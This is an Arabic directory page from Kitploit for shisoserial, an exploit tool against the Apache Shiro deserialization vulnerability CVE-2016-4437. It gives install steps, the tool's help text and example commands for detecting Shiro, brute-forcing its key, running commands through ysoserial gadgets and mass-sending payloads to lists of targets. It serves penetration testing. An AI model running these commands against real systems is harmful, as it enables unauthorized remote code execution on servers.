Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
shisoserial — أداة سريعة لاستغلال ثغرة إلغاء التسلسل في Shiro (CVE-2016-4437) / أداة بسيطة موجهة لهجمات إطار عمل Shiro باستخدام ysoserial. | Kitploit
أدوات/GitHubGitHub/4nth0ny1130/shisoserial
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHub4nth0ny1130/shisoserial

shisoserial

أداة سريعة لاستغلال ثغرة إلغاء التسلسل في Shiro (CVE-2016-4437) / أداة بسيطة موجهة لهجمات إطار عمل Shiro باستخدام ysoserial.

عرض المستودع
2422منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

shisoserial

الوثيقة الإنجليزية

ما هذا؟

أداة استغلال سريعة لثغرة إلغاء التسلسل في Shiro (CVE-2016-4437)

المساهمون

4nth0ny @مختبر الجمعة

مرحباً بفتح القضايا / طلبات السحب

:)

البيئة

  • python 3.x

  • JDK 1.8

التثبيت

root@kitploit:~
python3 -m pip install -r requirements.txt

لـ AttributeError: module 'Crypto.Cipher.AES' has no attribute 'MODE_GCM' أو No module named 'Crypto'

root@kitploit:~
python3 -m pip uninstall crypto pycryptodome
python3 -m pip install pycryptodome

الاستخدام

root@kitploit:~
usage: shisoserial.py [-h] --mode MODE --url  [--type default:CBC] [--data] [--key] [--gadget] [--command default:whoami] [--proxies] [--ser] [--thread]

This is a simple tool to attack framework shiro with ysoserial

optional arguments:
  -h, --help            show this help message and exit
  --mode MODE, -m MODE  check/crack/yso/echo/encode
  --url , -u            Target URL address or the file containing the target URL
  --type default:CBC, -t default:CBC
                        Cipher Type, GCM or CBC
  --data , -d           Using this parameter will make HTTP request with POST method
  --key , -k            Specify a Shiro Key or will use dictionary brute force cracking
  --gadget , -g         Specific Ysoserial Gadget
  --command default:whoami, -c default:whoami
                        Specific Execute Command
  --proxies , -p        Specific Proxy
  --ser , -s            Specific serialize file name
  --thread , -T         Specific the number of threads

أمثلة

التحقق مما إذا كان الهدف يستخدم إطار Shiro (باستخدام تشفير CBC الافتراضي)

root@kitploit:~
python3 shisoserial.py -m check -u http://127.0.0.1:8080

استخدام وكيل وتشفير CBC لتفجير مفتاح Shiro للهدف

root@kitploit:~
python3 shisoserial.py -m crack -u http://*.*.*.*:**** -t CBC -p ****://*.*.*.*:****/

استخدام سلسلة استغلال CommonsCollectionsK1 لتنفيذ أمر والحصول على نتيجة التنفيذ

root@kitploit:~
python3 shisoserial.py -m echo -u http://127.0.0.1:8080 -g CommonsCollectionsK1 -c id

التحقق الجماعي من مفتاح Shiro محدد باستخدام طلب POST

root@kitploit:~
python3 shisoserial.py -m crack -u target_urls.txt -k kPH+bIxk5D2deZiIxcaaaA== -d username=1

image-20211229223405240

استخدام ملف بيانات تسلسل لبناء الحمولة وإرسالها جماعياً بعدة خيوط

root@kitploit:~
python3 shisoserial.py -m encode -u target_urls.txt -t cbc -s 1.ser -T 4

image-20211230181021173

إخلاء مسؤولية

لا يمكن استخدام هذه الأداة إلا في بناء الأمن المؤسسي بعد الحصول على تفويض قانوني كافٍ. أثناء استخدام هذه الأداة، يجب عليك ضمان أن جميع سلوكياتك تتوافق مع القوانين واللوائح المحلية. إذا كان لديك أي سلوك غير قانوني أثناء استخدام هذه الأداة، فستتحمل جميع العواقب بنفسك، ولا يتحمل جميع مطوري الأداة وجميع المساهمين أي مسؤولية قانونية أو تضامنية. ما لم تكن قد قرأت وفهمت تماماً وقبلت جميع شروط هذه الاتفاقية، يرجى عدم تثبيت أو استخدام هذه الأداة. إن استخدامك أو أي طريقة أخرى صريحة أو ضمنية للتعبير عن قبول هذه الاتفاقية يعتبر بمثابة موافقتك على قراءة هذه الاتفاقية والالتزام بها.

تنزيل الأداة